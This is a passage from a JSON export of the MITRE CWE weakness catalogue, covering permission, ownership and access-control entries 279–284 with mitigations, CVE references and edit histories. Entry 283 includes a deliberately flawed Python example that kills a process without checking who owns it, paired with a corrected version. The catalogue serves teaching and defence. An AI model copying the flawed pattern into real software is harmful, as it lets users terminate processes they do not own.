Potential_Mitigations"}]}},"279":{"attr":{"@_ID":"279","@_Name":"Incorrect Execution-Assigned Permissions","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"While it is executing, the software sets the permissions of an object in a way that violates the intended permissions that have been specified by the user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Architecture and Design"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0265","Description":"Log files opened read/write.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0265"},{"Reference":"CVE-2003-0876","Description":"Log files opened read/write.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0876"},{"Reference":"CVE-2002-1694","Description":"Log files opened read/write.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1694"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insecure execution-assigned permissions"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO06-C","Entry_Name":"Create files with appropriate access permissions"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO01-J","Entry_Name":"Create files with appropriate access permission"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"81"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Insecure Execution-assigned Permissions","attr":{"@_Date":"2009-05-27"}}}},"280":{"attr":{"@_ID":"280","@_Name":"Improper Handling of Insufficient Permissions or Privileges","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application does not handle or incorrectly handles when it has insufficient privileges to access resources or functionality as specified by their permissions. This may cause it to follow unexpected code paths that may leave the application in an invalid state.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Other","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"Phase":"Implementation","Description":"Always check to see if you have successfully accessed a resource or system functionality, and use proper error handling if it is unsuccessful. Do this even when you are operating in a highly privileged mode, because errors or environmental conditions might still cause a failure. For example, environments with highly granular permissions/privilege models, such as Windows or Linux capabilities, can cause unexpected failures."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0501","Description":"Special file system allows attackers to prevent ownership/permission change of certain entries by opening the entries before calling a setuid program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0501"},{"Reference":"CVE-2004-0148","Description":"FTP server places a user in the root directory when the user\'s permissions prevent access to the their own home directory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0148"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Fails poorly due to insufficient permissions"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":17,"Entry_Name":"Improper Filesystem Permissions"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"Notes":{"Note":[{"#text":"CWE-280 and CWE-274 are too similar. It is likely that CWE-274 will be deprecated in the future.","attr":{"@_Type":"Maintenance"}},{"#text":"This can be both primary and resultant. When primary, it can expose a variety of weaknesses because a resource might not have the expected state, and subsequent operations might fail. It is often resultant from Unchecked Error Condition (CWE-391).","attr":{"@_Type":"Relationship"}},{"#text":"Within the context of vulnerability theory, privileges and permissions are two sides of the same coin. Privileges are associated with actors, and permissions are associated with resources. To perform access control, at some point the software makes a decision about whether the actor (and the privileges that have been assigned to that actor) is allowed to access the resource (based on the permissions that have been specified for that resource).","attr":{"@_Type":"Theoretical"}},{"#text":"This type of issue is under-studied, since researchers often concentrate on whether an object has too many permissions, instead of not enough. These weaknesses are likely to appear in environments with fine-grained models for permissions and privileges, which can include operating systems and other large-scale software packages. However, even highly simplistic permission/privilege models are likely to contain these issues if the developer has not considered the possibility of access failure.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Failure to Handle Insufficient Permissions or Privileges","attr":{"@_Date":"2009-03-10"}}}},"281":{"attr":{"@_ID":"281","@_Name":"Improper Preservation of Permissions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not preserve permissions or incorrectly preserves permissions when copying, restoring, or sharing objects, which can cause them to have less restrictive permissions than intended.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant","Description":"This is resultant from errors that prevent the permissions from being preserved."}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-2323","Description":"Incorrect ACLs used when restoring backups from directories that use symbolic links.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2323"},{"Reference":"CVE-2001-1515","Description":"Automatic modification of permissions inherited from another file system.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1515"},{"Reference":"CVE-2005-1920","Description":"Permissions on backup file are created with defaults, possibly less secure than original file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1920"},{"Reference":"CVE-2001-0195","Description":"File is made world-readable when being cloned.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0195"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Permission preservation failure"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Permission Preservation Failure","attr":{"@_Date":"2009-05-27"}}}},"282":{"attr":{"@_ID":"282","@_Name":"Improper Ownership Management","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software assigns the wrong ownership, or does not properly verify the ownership, of an object or resource.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-1999-1125","Description":"Program runs setuid root but relies on a configuration file owned by a non-root user.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1125"}},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Ownership errors"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"35"}}]},"Notes":{"Note":{"#text":"The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693).","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Ownership Issues","attr":{"@_Date":"2008-04-11"}}}},"283":{"attr":{"@_ID":"283","@_Name":"Unverified Ownership","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly verify that a critical resource is owned by the proper entity.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"282","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker could gain unauthorized access to system resources."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-49"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This function is part of a privileged program that takes input from users with potentially lower privileges.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"def killProcess(processID):","xhtml:div":{"#text":"os.kill(processID, signal.SIGKILL)","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good","@_Language":"Python"},"xhtml:div":{"#text":"def killProcess(processID):","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"user = getCurrentUser()if getProcessOwner(processID) == user:else:","xhtml:br":["","","",""],"xhtml:i":"#Check process owner against requesting user","xhtml:div":[{"#text":"os.kill(processID, signal.SIGKILL)return","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"print(\\"You cannot kill a process you don\'t own\\")return","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}}],"Body_Text":["This code does not confirm that the process to be killed is owned by the requesting user, thus allowing an attacker to kill arbitrary processes.","This function remedies the problem by checking the owner of the process before killing it:"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0178","Description":"Program does not verify the owner of a UNIX socket that is used for sending a password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0178"},{"Reference":"CVE-2004-2012","Description":"Owner of special device not checked, allowing root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2012"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unverified Ownership"}},"Notes":{"Note":{"#text":"This overlaps insufficient comparison, verification errors, permissions, and privileges.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"284":{"attr":{"@_ID":"284","@_Name":"Improper Access Control","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor.","Extended_Description":{"xhtml:p":["Access control involves the use of several protection mechanisms such as:","When any mechanism is not applied or otherwise fails, attackers can compromise the security of the software by gaining privileges, reading sensitive information, executing commands, evading detection, etc.","There are two distinct behaviors that can introduce access control weaknesses:"],"xhtml:ul":{"xhtml:li":["Authentication (proving the identity of an actor)","Authorization (ensuring that a given actor can access a resource), and","Accountability (tracking of activities that were performed)"]},"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Specification: incorrect privileges, permissions, ownership, etc. are explicitly specified for either the user or the resource (for example, setting a password file to be world-writable, or giving administrator capabilities to a guest user). This action could be performed by the program or the administrator.","Enforcement: the mechanism contains errors that prevent it from properly enforcing the specified access control requirements (e.g., allowing the user to specify their own privileges, or allowing a syntactically-incorrect ACL to produce insecure settings). This problem occurs within the program itself, in that it does not actually enforce the intended security policy that the administrator specifies."]}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Authorization","Description":"The terms \\"access control\\" and \\"authorization\\" are often used interchangeably, although many people have distinct definitions. The CWE usage of \\"access control\\" is intended as a general term for the various mechanisms that restrict which users can access which resources, and \\"authorization\\" is more narrowly defined. It is unlikely that there will be community consensus on the use of these terms."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2010-4624","Description":"Bulletin board applies restrictions on number of images during post creation, but does not enforce this on editing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4624"}},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Access Control List (ACL) errors"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":2,"Entry_Name":"Insufficient Authorization"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Missing Access Control"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"19"}},{"attr":{"@_CAPEC_ID":"441"}},{"attr":{"@_CAPEC_ID":"478"}},{"attr":{"@_CAPEC_ID":"479"}},{"attr":{"@_CAPEC_ID":"502"}},{"attr":{"@_CAPEC_ID":"503"}},{"attr":{"@_CAPEC_ID":"536"}},{"attr":{"@_CAPEC_ID":"546"}},{"attr":{"@_CAPEC_ID":"550"}},{"attr":{"@_CAPEC_ID":"551"}},{"attr":{"@_CAPEC_ID":"552"}},{"attr":{"@_CAPEC_ID":"556"}},{"attr":{"@_CAPEC_ID":"558"}},{"attr":{"@_CAPEC_ID":"562"}},{"attr":{"@_CAPEC_ID":"563"}},{"attr":{"@_CAPEC_ID":"564"}},{"attr":{"@_CAPEC_ID":"578"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 6, &#34;Determining Appropriate Access Control&#34; Page 171"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 17: Failure to Protect Stored Data.&#34; Page 253"}}]},"Notes":{"Note":{"attr":{"@_Type":"Maintenance"},"xhtml:p":"This entry needs more work. Possible sub-categories include:","xhtml:ul":{"xhtml:li":["Trusted group includes undesired entities (partially covered by CWE-286)","Group can perform undesired actions","ACL parse error does not fail closed"]}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Background_Details, Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Alternate_Terms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-24","Modification_Importance":"Critical","Modification_Comment":"Changed name and description; clarified difference between \\"access control\\" and \\"authorization.\\""},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Alternate_Terms, Background_Details, Description, Maintenance_Notes, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Modes_of_Introduction, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content 